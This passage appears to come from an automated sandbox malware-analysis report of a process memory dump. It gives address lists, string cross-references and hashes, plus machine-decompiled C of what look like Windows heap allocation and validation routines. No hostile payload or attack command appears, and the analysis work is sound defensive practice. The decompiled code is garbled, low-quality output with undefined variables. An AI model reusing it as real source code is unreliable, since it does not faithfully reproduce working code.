0x02a14b3c
0x02a14b41
0x02a14b41
0x02a14b3a
0x02a14b52
0x02a15045
0x02a1504b
0x02a1504f
0x02a1506e
0x02a15073
0x02a15051
0x02a15066
0x02a1506b
0x02a15083
0x02a15088
0x02a15088
0x02a1508a
0x02a15091
0x02a15099
0x02a15099
0x02a1509d
0x02a150a7
0x02a150ad
0x02a150ad
0x02a150ad
0x00000000
0x02a1509d
0x02a14b58
0x02a14b5b
0x02a14b5e
0x02a14b63
0x02a14b66
0x02a14b69
0x02a14b6f
0x02a14be4
0x02a14bf0
0x02a14bf2
0x02a14bf5
0x02a14dc3
0x02a14dc6
0x02a14dc9
0x02a14dce
0x02a14dce
0x02a14dd0
0x02a14dd0
0x02a14dd5
0x02a14def
0x02a14dd7
0x02a14de7
0x02a14de7
0x02a14df3
0x02a15001
0x02a15007
0x02a1500b
0x02a1502a
0x02a1502f
0x02a1500d
0x02a15022
0x02a15027
0x02a15039
0x02a1503a
0x02a1503b
0x00000000
0x02a14df9
0x02a14dfd
0x02a14e90
0x02a14e94
0x02a14e9e
0x02a14ea4
0x02a14ea4
0x02a14ea4
0x02a14ea6
0x02a14ea6
0x00000000
0x02a14ea6
0x02a14e03
0x02a14e08
0x02a14f88
0x02a14f92
0x02a14f99
0x02a14f9c
0x02a14fe0
0x02a14fe4
0x02a14fee
0x02a14ff4
0x02a14ff4
0x02a14ff4
0x00000000
0x02a14fe4
0x02a14f9e
0x02a14fa4
0x02a14fa8
0x02a14fc7
0x02a14fcc
0x02a14faa
0x02a14fbf
0x02a14fc4
0x02a14fd2
0x02a14fd5
0x02a14fd6
0x02a14f34
0x02a14f34
0x00000000
0x02a14f39
0x02a14e0e
0x02a14e14
0x02a14e1b
0x02a14e25
0x02a14e2b
0x02a14e2b
0x02a14e33
0x02a14e38
0x02a14e8a
0x02a14e8a
0x00000000
0x02a14e3a
0x02a14e3e
0x02a14e43
0x02a14e47
0x02a14e53
0x02a14e58
0x02a14e5a
0x02a14e5c
0x02a14e61
0x02a14e61
0x02a14e5a
0x02a14e6e
0x02a14f41
0x02a14f47
0x02a14f4b
0x02a14f6a
0x02a14f6f
0x02a14f4d
0x02a14f62
0x02a14f67
0x02a14f7f
0x02a14f80
0x02a14f81
0x00000000
0x02a14e74
0x02a14e78
0x02a14e82
0x02a14e88
0x02a14e88
0x00000000
0x02a14e78
0x02a14e6e
0x02a14e38
0x02a14df3
0x02a14bfe
0x02a14c01
0x02a14c04
0x02a14c07
0x02a14c09
0x02a14c0c
0x02a14c0e
0x02a14c0e
0x02a14c11
0x02a14c11
0x02a14c0c
0x02a14c14
0x02a14c17
0x02a14dae
0x02a14db2
0x02a14db7
0x02a14dba
0x02a14dbd
0x02a14ef1
0x02a14ef7
0x02a14efb
0x02a14f1a
0x02a14f1f
0x02a14efd
0x02a14f12
0x02a14f17
0x02a14f2b
0x02a14f2b
0x02a14f2d
0x02a14f2e
0x02a14f2f
0x00000000
0x02a14f2f
0x00000000
0x02a14c1d
0x02a14c1d
0x02a14c20
0x02a14c23
0x02a14c26
0x02a14c29
0x02a14c2c
0x02a14c2e
0x02a14d91
0x02a14d91
0x02a14d92
0x02a14d97
0x02a14d9e
0x00000000
0x02a14d9e
0x02a14c34
0x02a14c37
0x02a14c39
0x02a14c3c
0x00000000
0x00000000
0x02a14c45
0x02a14c48
0x02a14c4e
0x02a14c50
0x02a14c78
0x02a14c78
0x02a14c7b
0x02a14c7d
0x02a14c80
0x02a14c84
0x02a14cad
0x02a14cad
0x02a14cb0
0x02a14cb8
0x02a14cbb
0x02a14cbe
0x02a14cc1
0x02a14cc7
0x02a14cdc
0x02a14cc9
0x02a14cd2
0x02a14cd4
0x02a14cd4
0x02a14cde
0x02a14ce0
0x02a14d13
0x02a14d13
0x02a14d16
0x02a14d18
0x02a14d29
0x02a14d2a
0x02a14d2c
0x02a14d34
0x02a14d1a
0x02a14d1a
0x02a14d1a
0x02a14d1d
0x02a14d1f
0x02a14d22
0x02a14d24
0x02a14d24
0x02a14d3c
0x02a14d3f
0x02a14d45
0x02a14d47
0x02a14d6c
0x02a14d6c
0x02a14d70
0x02a14d7e
0x02a14d84
0x02a14d84
0x00000000
0x02a14d49
0x02a14d49
0x02a14d56
0x02a14d56
0x02a14d59
0x00000000
0x00000000
0x02a14d4e
0x02a14d50
0x02a14d52
0x02a14d8e
0x02a14d5d
0x02a14d5f
0x02a14d67
0x00000000
0x02a14d67
0x02a14d54
0x02a14d54
0x02a14d5b
0x00000000
0x02a14d5b
0x02a14ce2
0x02a14ce2
0x02a14ce5
0x02a14ce5
0x02a14ce7
0x02a14cfb
0x02a14ce9
0x02a14ce9
0x02a14cec
0x02a14cef
0x02a14cf1
0x02a14cf3
0x02a14cf3
0x02a14cf3
0x02a14cf6
0x02a14cf6
0x02a14d02
0x02a14d05
0x00000000
0x00000000
0x02a14d07
0x02a14d0f
0x02a14d11
0x00000000
0x00000000
0x00000000
0x02a14d11
0x00000000
0x02a14ce5
0x02a14ce0
0x02a14c8a
0x02a14c8f
0x02a14c91
0x00000000
0x00000000
0x02a14c9d
0x00000000
0x02a14c9d
0x02a14c52
0x02a14c5f
0x02a14c5f
0x02a14c62
0x00000000
0x00000000
0x02a14c57
0x02a14c59
0x02a14c5b
0x02a14caa
0x02a14c66
0x02a14c68
0x02a14c70
0x02a14c75
0x00000000
0x02a14c75
0x02a14c5d
0x02a14c5d
0x02a14c64
0x00000000
0x02a14c64
0x02a14c17
0x02a14b75
0x02a14bc4
0x02a14bc8
0x00000000
0x00000000
0x02a14bd9
0x00000000
0x00000000
0x00000000
0x02a14b77
0x02a14b7a
0x02a14b8c
0x02a14b7c
0x02a14b7e
0x02a14b83
0x02a14b86
0x02a14b86
0x02a14b90
0x02a14b93
0x00000000
0x00000000
0x02a14b95
0x02a14bab
0x02a14bb0
0x00000000
0x00000000
0x02a14bb2
0x02a14bb9
0x00000000
0x00000000
0x02a14bbb
0x02a14bbe
0x02a14bc1
0x02a14bc1
0x00000000
0x02a14bc1
0x02a14b97
0x02a14ba4
0x00000000
0x00000000
0x02a14ba6
0x00000000
0x02a14ba6
0x02a14ea9
0x02a14ea9
0x02a14eb2
0x00000000

Strings

HEAP: , xrefs: 02A14F1A, 02A14F6A, 02A14FC7, 02A1502A, 02A1506E, 02A150B6, 02A15107
Heap block at %p is not last block in segment (%p), xrefs: 02A14FD6
Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x), xrefs: 02A15119
Heap block at %p has incorrect segment offset (%x), xrefs: 02A1503B
MZER, xrefs: 02A14DE7
Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x), xrefs: 02A150C6
Heap block at %p has corrupted PreviousSize (%lx), xrefs: 02A14F81
Free Heap block %p modified at %p after it was freed, xrefs: 02A14F2F
Heap entry %p has incorrect PreviousSize field (%04x instead of %04x), xrefs: 02A1508C
HEAP[%wZ]: , xrefs: 02A14EE1, 02A14F0D, 02A14F5D, 02A14FBA, 02A1501D, 02A15061, 02A150FA

Memory Dump Source

Source File: 00000002.00000002.358703617.0000000002930000.00000040.00000001.sdmp, Offset: 02930000, based on PE: true

Associated: 00000002.00000002.358798882.0000000002A4B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.358805587.0000000002A4F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)$MZER
API String ID: 0-307754900
Opcode ID: 9b280bac4d8dd3058ac74b8fd1ccd0c1efbef3138da0d085b1ddb50edf439f20
Instruction ID: e8eaab21889c5d3ace4e8558f1ea0031ffdb03d121271bcb82f6cb09892d9b51
Opcode Fuzzy Hash: 9b280bac4d8dd3058ac74b8fd1ccd0c1efbef3138da0d085b1ddb50edf439f20
Instruction Fuzzy Hash: 5C12C2346046429FDB25CF6DC495BB6B7F6FF88728F148459E4868B681DB34E881CF90

Uniqueness

Uniqueness Score: -1.00%

Function 02A12D82, Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 228
timeCOMMONCrypto

Download Yara Rule

C-Code - Quality: 64%

			E02A12D82(void* __ebx, intOrPtr* __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t83;
				signed char _t89;
				intOrPtr _t90;
				signed char _t101;
				signed int _t102;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				intOrPtr _t108;
				intOrPtr _t112;
				short* _t130;
				short _t131;
				signed int _t148;
				intOrPtr _t149;
				signed int* _t154;
				short* _t165;
				signed int _t171;
				void* _t182;

				_push(0x44);
				_push(0x2a30e80);
				E029AD0E8(__ebx, __edi, __esi);
				_t177 = __edx;
				_t181 = __ecx;
				 *((intOrPtr*)(_t182 - 0x44)) = __ecx;
				 *((char*)(_t182 - 0x1d)) = 0;
				 *(_t182 - 0x24) = 0;
				if(( *(__ecx + 0x44) & 0x01000000) == 0) {
					 *((intOrPtr*)(_t182 - 4)) = 0;
					 *((intOrPtr*)(_t182 - 4)) = 1;
					_t83 = E029540E1("RtlAllocateHeap");
					__eflags = _t83;
					if(_t83 == 0) {
						L48:
						 *(_t182 - 0x24) = 0;
						L49:
						 *((intOrPtr*)(_t182 - 4)) = 0;
						 *((intOrPtr*)(_t182 - 4)) = 0xfffffffe;
						E02A130C4();
						goto L50;
					}
					_t89 =  *(__ecx + 0x44) | __edx | 0x10000100;
					 *(_t182 - 0x28) = _t89;
					 *(_t182 - 0x3c) = _t89;
					_t177 =  *(_t182 + 8);
					__eflags = _t177;
					if(_t177 == 0) {
						_t171 = 1;
						__eflags = 1;
					} else {
						_t171 = _t177;
					}
					_t148 =  *((intOrPtr*)(_t181 + 0x94)) + _t171 &  *(_t181 + 0x98);
					__eflags = _t148 - 0x10;
					if(_t148 < 0x10) {
						_t148 = 0x10;
					}
					_t149 = _t148 + 8;
					 *((intOrPtr*)(_t182 - 0x48)) = _t149;
					__eflags = _t149 - _t177;
					if(_t149 < _t177) {
						L44:
						_t90 =  *[fs:0x30];
						__eflags =  *(_t90 + 0xc);
						if( *(_t90 + 0xc) == 0) {
							_push("HEAP: ");
							E0295B150();
						} else {
							E0295B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push( *((intOrPtr*)(_t181 + 0x78)));
						E0295B150("Invalid allocation size - %Ix (exceeded %Ix)\n", _t177);
						goto L48;
					} else {
						__eflags = _t149 -  *((intOrPtr*)(_t181 + 0x78));
						if(_t149 >  *((intOrPtr*)(_t181 + 0x78))) {
							goto L44;
						}
						__eflags = _t89 & 0x00000001;
						if((_t89 & 0x00000001) != 0) {
							_t178 =  *(_t182 - 0x28);
						} else {
							E0296EEF0( *((intOrPtr*)(_t181 + 0xc8)));
							 *((char*)(_t182 - 0x1d)) = 1;
							_t178 =  *(_t182 - 0x28) | 0x00000001;
							 *(_t182 - 0x3c) =  *(_t182 - 0x28) | 0x00000001;
						}
						E02A14496(_t181, 0);
						_t177 = L02974620(_t181, _t181, _t178,  *(_t182 + 8));
						 *(_t182 - 0x24) = _t177;
						_t173 = 1;
						E02A149A4(_t181);
						__eflags = _t177;
						if(_t177 == 0) {
							goto L49;
						} else {
							_t177 = _t177 + 0xfffffff8;
							__eflags =  *((char*)(_t177 + 7)) - 5;
							if( *((char*)(_t177 + 7)) == 5) {
								_t177 = _t177 - (( *(_t177 + 6) & 0x000000ff) << 3);
								__eflags = _t177;
							}
							_t154 = _t177;
							 *(_t182 - 0x40) = _t177;
							__eflags =  *(_t181 + 0x4c);
							if( *(_t181 + 0x4c) != 0) {
								 *_t177 =  *_t177 ^  *(_t181 + 0x50);
								__eflags =  *(_t177 + 3) - (_t154[0] ^ _t154[0] ^  *_t154);
								if(__eflags != 0) {
									_push(_t154);
									_t173 = _t177;
									E02A0FA2B(0, _t181, _t177, _t177, _t181, __eflags);
								}
							}
							__eflags =  *(_t177 + 2) & 0x00000002;
							if(( *(_t177 + 2) & 0x00000002) == 0) {
								_t101 =  *(_t177 + 3);
								 *(_t182 - 0x29) = _t101;
								_t102 = _t101 & 0x000000ff;
							} else {
								_t130 = E02951F5B(_t177);
								 *((intOrPtr*)(_t182 - 0x30)) = _t130;
								__eflags =  *(_t181 + 0x40) & 0x08000000;
								if(( *(_t181 + 0x40) & 0x08000000) == 0) {
									 *_t130 = 0;
								} else {
									_t131 = E029816C7(1, _t173);
									_t165 =  *((intOrPtr*)(_t182 - 0x30));
									 *_t165 = _t131;
									_t130 = _t165;
								}
								_t102 =  *(_t130 + 2) & 0x0000ffff;
							}
							 *(_t182 - 0x34) = _t102;
							 *(_t182 - 0x28) = _t102;
							__eflags =  *(_t181 + 0x4c);
							if( *(_t181 + 0x4c) != 0) {
								 *(_t177 + 3) =  *(_t177 + 2) ^  *(_t177 + 1) ^  *_t177;
								 *_t177 =  *_t177 ^  *(_t181 + 0x50);
								__eflags =  *_t177;
							}
							__eflags =  *(_t181 + 0x40) & 0x20000000;
							if(( *(_t181 + 0x40) & 0x20000000) != 0) {
								__eflags = 0;
								E02A14496(_t181, 0);
							}
							__eflags =  *(_t182 - 0x24) -  *0x2a46360; // 0x0
							_t104 =  *[fs:0x30];
							if(__eflags != 0) {
								_t105 =  *(_t104 + 0x68);
								 *(_t182 - 0x4c) = _t105;
								__eflags = _t105 & 0x00000800;
								if((_t105 & 0x00000800) == 0) {
									goto L49;
								}
								_t106 =  *(_t182 - 0x34);
								__eflags = _t106;
								if(_t106 == 0) {
									goto L49;
								}
								__eflags = _t106 -  *0x2a46364; // 0x0
								if(__eflags != 0) {
									goto L49;
								}
								__eflags =  *((intOrPtr*)(_t181 + 0x7c)) -  *0x2a46366; // 0x0
								if(__eflags != 0) {
									goto L49;
								}
								_t108 =  *[fs:0x30];
								__eflags =  *(_t108 + 0xc);
								if( *(_t108 + 0xc) == 0) {
									_push("HEAP: ");
									E0295B150();
								} else {
									E0295B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push(E029FD455(_t181,  *(_t182 - 0x28)));
								_push( *(_t182 + 8));
								E0295B150("Just allocated block at %p for 0x%Ix bytes with tag %ws\n",  *(_t182 - 0x24));
								goto L34;
							} else {
								__eflags =  *(_t104 + 0xc);
								if( *(_t104 + 0xc) == 0) {
									_push("HEAP: ");
									E0295B150();
								} else {
									E0295B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push( *(_t182 + 8));
								E0295B150("Just allocated block at %p for %Ix bytes\n",  *0x2a46360);
								L34:
								_t112 =  *[fs:0x30];
								__eflags =  *((char*)(_t112 + 2));
								if( *((char*)(_t112 + 2)) != 0) {
									 *0x2a46378 = 1;
									 *0x2a460c0 = 0;
									asm("int3");
									 *0x2a46378 = 0;
								}
								goto L49;
							}
						}
					}
				} else {
					_t181 =  *0x2a45708; // 0x0
					 *0x2a4b1e0(__ecx, __edx,  *(_t182 + 8));
					 *_t181();
					L50:
					return E029AD130(0, _t177, _t181);
				}
			}

0x02a12d82
0x02a12d84
0x02a12d89
0x02a12d8e
0x02a12d90
0x02a12d92
0x02a12d97
0x02a12d9a
0x02a12da4
0x02a12dc0
0x02a12dc3
0x02a12dd1
0x02a12dd6
0x02a12dd8
0x02a130a7
0x02a130a7
0x02a130aa
0x02a130aa
0x02a130ad
0x02a130b4
0x00000000
0x02a130b9
0x02a12de3
0x02a12de8
0x02a12deb
0x02a12dee
0x02a12df1
0x02a12df3
0x02a12dfb
0x02a12dfb
0x02a12df5
0x02a12df5
0x02a12df5
0x02a12e04
0x02a12e0a
0x02a12e0d
0x02a12e11
0x02a12e11
0x02a12e12
0x02a12e15
0x02a12e18
0x02a12e1a
0x02a13027
0x02a13027
0x02a1302d
0x02a13030
0x02a1304f
0x02a13054
0x02a13032
0x02a13047
0x02a1304c
0x02a1305a
0x02a13063
0x00000000
0x02a12e20
0x02a12e20
0x02a12e23
0x00000000
0x00000000
0x02a12e29
0x02a12e2b
0x02a12e47
0x02a12e2d
0x02a12e33
0x02a12e38
0x02a12e3f
0x02a12e42
0x02a12e42
0x02a12e4e
0x02a12e5d
0x02a12e5f
0x02a12e62
0x02a12e66
0x02a12e6b
0x02a12e6d
0x00000000
0x02a12e73
0x02a12e73
0x02a12e76
0x02a12e7a
0x02a12e83
0x02a12e83
0x02a12e83
0x02a12e85
0x02a12e87
0x02a12e8a
0x02a12e8d
0x02a12e92
0x02a12e9c
0x02a12e9f
0x02a12ea1
0x02a12ea2
0x02a12ea6
0x02a12ea6
0x02a12e9f
0x02a12eab
0x02a12eaf
0x02a12edf
0x02a12ee2
0x02a12ee5
0x02a12eb1
0x02a12eb3
0x02a12eb8
0x02a12ebd
0x02a12ec4
0x02a12ed6
0x02a12ec6
0x02a12ec7
0x02a12ecc
0x02a12ecf
0x02a12ed2
0x02a12ed2
0x02a12ed9
0x02a12ed9
0x02a12ee8
0x02a12eeb
0x02a12eef
0x02a12ef2
0x02a12efe
0x02a12f04
0x02a12f04
0x02a12f04
0x02a12f06
0x02a12f0d
0x02a12f0f
0x02a12f13
0x02a12f13
0x02a12f1b
0x02a12f21
0x02a12f27
0x02a12f95
0x02a12f98
0x02a12f9b
0x02a12fa0
0x00000000
0x00000000
0x02a12fa6
0x02a12fa9
0x02a12fac
0x00000000
0x00000000
0x02a12fb2
0x02a12fb9
0x00000000
0x00000000
0x02a12fc3
0x02a12fca
0x00000000
0x00000000
0x02a12fd0
0x02a12fd6
0x02a12fd9
0x02a12ff8
0x02a12ffd
0x02a12fdb
0x02a12ff0
0x02a12ff5
0x02a1300e
0x02a1300f
0x02a1301a
0x00000000
0x02a12f29
0x02a12f29
0x02a12f2c
0x02a12f4b
0x02a12f50
0x02a12f2e
0x02a12f43
0x02a12f48
0x02a12f56
0x02a12f64
0x02a12f6c
0x02a12f6c
0x02a12f72
0x02a12f76
0x02a12f7c
0x02a12f83
0x02a12f89
0x02a12f8a
0x02a12f8a
0x00000000
0x02a12f76
0x02a12f27
0x02a12e6d
0x02a12da6
0x02a12dab
0x02a12db3
0x02a12db9
0x02a130bc
0x02a130c1
0x02a130c1

APIs

RtlDebugPrintTimes.NTDLL ref: 02A12DB3

Strings

Invalid allocation size - %Ix (exceeded %Ix), xrefs: 02A1305E
HEAP: , xrefs: 02A12F4B, 02A12FF8, 02A1304F
Just allocated block at %p for %Ix bytes, xrefs: 02A12F5F
Just allocated block at %p for 0x%Ix bytes with tag %ws, xrefs: 02A13015
RtlAllocateHeap, xrefs: 02A12DCA
HEAP[%wZ]: , xrefs: 02A12F3E, 02A12FEB, 02A13042

Memory Dump Source

Source File: 00000002.00000002.358703617.0000000002930000.00000040.00000001.sdmp, Offset: 02930000, based on PE: true

Associated: 00000002.00000002.358798882.0000000002A4B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.358805587.0000000002A4F000.00000040.00000001.sdmp Download File

Similarity

API ID: DebugPrintTimes
String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
API String ID: 3446177414-1745908468
Opcode ID: 3213193a6ed8786c28cbb150774e3a25a2b1eb2d7be033491961d76d0ccf654d
Instruction ID: 5ada92a631e38a75ced70f4e202bf6ff381f464c3fbe4efa04d15c2ca2457eee
Opcode Fuzzy Hash: 3213193a6ed8786c28cbb150774e3a25a2b1eb2d7be033491961d76d0ccf654d
Instruction Fuzzy Hash: 0A91E535A006549FDB26DF68C494BADBBF2FF89724F188459E8469B691CF32D881CF10

Uniqueness

Uniqueness Score: -1.00%

Function 02A14496, Relevance: 10.4, Strings: 8, Instructions: 417
COMMONCrypto

Download Yara Rule

C-Code - Quality: 56%

			E02A14496(signed int* __ecx, void* __edx) {
				signed int _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed char _v24;
				signed int* _v28;
				char _v32;
				signed int* _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t150;
				intOrPtr _t151;
				signed char _t156;
				intOrPtr _t157;
				unsigned int _t169;
				intOrPtr _t170;
				signed int* _t183;
				signed char _t184;
				intOrPtr _t191;
				signed int _t201;
				intOrPtr _t203;
				intOrPtr _t212;
				intOrPtr _t220;
				signed int _t230;
				signed int _t241;
				signed int _t244;
				void* _t259;
				signed int _t260;
				signed int* _t261;
				intOrPtr* _t262;
				signed int _t263;
				signed int* _t264;
				signed int _t267;
				signed int* _t268;
				void* _t270;
				void* _t281;
				signed short _t285;
				signed short _t289;
				signed int _t291;
				signed int _t298;
				signed char _t303;
				signed char _t308;
				signed int _t314;
				intOrPtr _t317;
				unsigned int _t319;
				signed int* _t325;
				signed int _t326;
				signed int _t327;
				intOrPtr _t328;
				signed int _t329;
				signed int _t330;
				signed int* _t331;
				signed int _t332;
				signed int _t350;

				_t259 = __edx;
				_t331 = __ecx;
				_v28 = __ecx;
				_v20 = 0;
				_v12 = 0;
				_t150 = E02A149A4(__ecx);
				_t267 = 1;
				if(_t150 == 0) {
					L61:
					_t151 =  *[fs:0x30];
					__eflags =  *((char*)(_t151 + 2));
					if( *((char*)(_t151 + 2)) != 0) {
						 *0x2a46378 = _t267;
						asm("int3");
						 *0x2a46378 = 0;
					}
					__eflags = _v12;
					if(_v12 != 0) {
						_t105 =  &_v16;
						 *_t105 = _v16 & 0x00000000;
						__eflags =  *_t105;
						E0298174B( &_v12,  &_v16, 0x8000);
					}
					L65:
					__eflags = 0;
					return 0;
				}
				if(_t259 != 0 || (__ecx[0x10] & 0x20000000) != 0) {
					_t268 =  &(_t331[0x30]);
					_v32 = 0;
					_t260 =  *_t268;
					_t308 = 0;
					_v24 = 0;
					while(_t268 != _t260) {
						_t260 =  *_t260;
						_v16 =  *_t325 & 0x0000ffff;
						_t156 = _t325[0];
						_v28 = _t325;
						_v5 = _t156;
						__eflags = _t156 & 0x00000001;
						if((_t156 & 0x00000001) != 0) {
							_t157 =  *[fs:0x30];
							__eflags =  *(_t157 + 0xc);
							if( *(_t157 + 0xc) == 0) {
								_push("HEAP: ");
								E0295B150();
							} else {
								E0295B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push(_t325);
							E0295B150("dedicated (%04Ix) free list element %p is marked busy\n", _v16);
							L32:
							_t270 = 0;
							__eflags = _t331[0x13];
							if(_t331[0x13] != 0) {
								_t325[0] = _t325[0] ^ _t325[0] ^  *_t325;
								 *_t325 =  *_t325 ^ _t331[0x14];
							}
							L60:
							_t267 = _t270 + 1;
							__eflags = _t267;
							goto L61;
						}
						_t169 =  *_t325 & 0x0000ffff;
						__eflags = _t169 - _t308;
						if(_t169 < _t308) {
							_t170 =  *[fs:0x30];
							__eflags =  *(_t170 + 0xc);
							if( *(_t170 + 0xc) == 0) {
								_push("HEAP: ");
								E0295B150();
							} else {
								E0295B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							E0295B150("Non-Dedicated free list element %p is out of order\n", _t325);
							goto L32;
						} else {
							__eflags = _t331[0x13];
							_t308 = _t169;
							_v24 = _t308;
							if(_t331[0x13] != 0) {
								_t325[0] = _t169 >> 0x00000008 ^ _v5 ^ _t308;
								 *_t325 =  *_t325 ^ _t331[0x14];
								__eflags =  *_t325;
							}
							_t26 =  &_v32;
							 *_t26 = _v32 + 1;
							__eflags =  *_t26;
							continue;
						}
					}
					_v16 = 0x208 + (_t331[0x21] & 0x0000ffff) * 4;
					if( *0x2a46350 != 0 && _t331[0x2f] != 0) {
						_push(4);
						_push(0x1000);
						_push( &_v16);
						_push(0);
						_push( &_v12);
						_push(0xffffffff);
						if(E02999660() >= 0) {
							_v20 = _v12 + 0x204;
						}
					}
					_t183 =  &(_t331[0x27]);
					_t281 = 0x81;
					_t326 =  *_t183;
					if(_t183 == _t326) {
						L49:
						_t261 =  &(_t331[0x29]);
						_t184 = 0;
						_t327 =  *_t261;
						_t282 = 0;
						_v24 = 0;
						_v36 = 0;
						__eflags = _t327 - _t261;
						if(_t327 == _t261) {
							L53:
							_t328 = _v32;
							_v28 = _t331;
							__eflags = _t328 - _t184;
							if(_t328 == _t184) {
								__eflags = _t331[0x1d] - _t282;
								if(_t331[0x1d] == _t282) {
									__eflags = _v12;
									if(_v12 == 0) {
										L82:
										_t267 = 1;
										__eflags = 1;
										goto L83;
									}
									_t329 = _t331[0x2f];
									__eflags = _t329;
									if(_t329 == 0) {
										L77:
										_t330 = _t331[0x22];
										__eflags = _t330;
										if(_t330 == 0) {
											L81:
											_t129 =  &_v16;
											 *_t129 = _v16 & 0x00000000;
											__eflags =  *_t129;
											E0298174B( &_v12,  &_v16, 0x8000);
											goto L82;
										}
										_t314 = _t331[0x21] & 0x0000ffff;
										_t285 = 1;
										__eflags = 1 - _t314;
										if(1 >= _t314) {
											goto L81;
										} else {
											goto L79;
										}
										while(1) {
											L79:
											_t330 = _t330 + 0x40;
											_t332 = _t285 & 0x0000ffff;
											_t262 = _v20 + _t332 * 4;
											__eflags =  *_t262 -  *((intOrPtr*)(_t330 + 8));
											if( *_t262 !=  *((intOrPtr*)(_t330 + 8))) {
												break;
											}
											_t285 = _t285 + 1;
											__eflags = _t285 - _t314;
											if(_t285 < _t314) {
												continue;
											}
											goto L81;
										}
										_t191 =  *[fs:0x30];
										__eflags =  *(_t191 + 0xc);
										if( *(_t191 + 0xc) == 0) {
											_push("HEAP: ");
											E0295B150();
										} else {
											E0295B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
										}
										_push(_t262);
										_push( *((intOrPtr*)(_v20 + _t332 * 4)));
										_t148 = _t330 + 0x10; // 0x10
										_push( *((intOrPtr*)(_t330 + 8)));
										E0295B150("Tag %04x (%ws) size incorrect (%Ix != %Ix) %p\n", _t332);
										L59:
										_t270 = 0;
										__eflags = 0;
										goto L60;
									}
									_t289 = 1;
									__eflags = 1;
									while(1) {
										_t201 = _v12;
										_t329 = _t329 + 0xc;
										_t263 = _t289 & 0x0000ffff;
										__eflags =  *((intOrPtr*)(_t201 + _t263 * 4)) -  *((intOrPtr*)(_t329 + 8));
										if( *((intOrPtr*)(_t201 + _t263 * 4)) !=  *((intOrPtr*)(_t329 + 8))) {
											break;
										}
										_t289 = _t289 + 1;
										__eflags = _t289 - 0x81;
										if(_t289 < 0x81) {
											continue;
										}
										goto L77;
									}
									_t203 =  *[fs:0x30];
									__eflags =  *(_t203 + 0xc);
									if( *(_t203 + 0xc) == 0) {
										_push("HEAP: ");
										E0295B150();
									} else {
										E0295B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
									}
									_t291 = _v12;
									_push(_t291 + _t263 * 4);
									_push( *((intOrPtr*)(_t291 + _t263 * 4)));
									_push( *((intOrPtr*)(_t329 + 8)));
									E0295B150("Pseudo Tag %04x size incorrect (%Ix != %Ix) %p\n", _t263);
									goto L59;
								}
								_t212 =  *[fs:0x30];
								__eflags =  *(_t212 + 0xc);
								if( *(_t212 + 0xc) == 0) {
									_push("HEAP: ");
									E0295B150();
								} else {
									E0295B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push(_t331[0x1d]);
								_push(_v36);
								_push("Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)\n");
								L58:
								E0295B150();
								goto L59;
							}
							_t220 =  *[fs:0x30];
							__eflags =  *(_t220 + 0xc);
							if( *(_t220 + 0xc) == 0) {
								_push("HEAP: ");
								E0295B150();
							} else {
								E0295B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push(_t328);
							_push(_v24);
							_push("Number of free blocks in arena (%ld) does not match number in the free lists (%ld)\n");
							goto L58;
						} else {
							goto L50;
						}
						while(1) {
							L50:
							_t92 = _t327 - 0x10; // -24
							_t282 = _t331;
							_t230 = E02A14AEF(_t331, _t92, _t331,  &_v24,  &_v36,  &_v28, _v20, _v12);
							__eflags = _t230;
							if(_t230 == 0) {
								goto L59;
							}
							_t327 =  *_t327;
							__eflags = _t327 - _t261;
							if(_t327 != _t261) {
								continue;
							}
							_t184 = _v24;
							_t282 = _v36;
							goto L53;
						}
						goto L59;
					} else {
						while(1) {
							_t39 = _t326 + 0x18; // 0x10
							_t264 = _t39;
							if(_t331[0x13] != 0) {
								_t319 = _t331[0x14] ^  *_t264;
								 *_t264 = _t319;
								_t303 = _t319 >> 0x00000010 ^ _t319 >> 0x00000008 ^ _t319;
								_t348 = _t319 >> 0x18 - _t303;
								if(_t319 >> 0x18 != _t303) {
									_push(_t303);
									E02A0FA2B(_t264, _t331, _t264, _t326, _t331, _t348);
								}
								_t281 = 0x81;
							}
							_t317 = _v20;
							if(_t317 != 0) {
								_t241 =  *(_t326 + 0xa) & 0x0000ffff;
								_t350 = _t241;
								if(_t350 != 0) {
									if(_t350 >= 0) {
										__eflags = _t241 & 0x00000800;
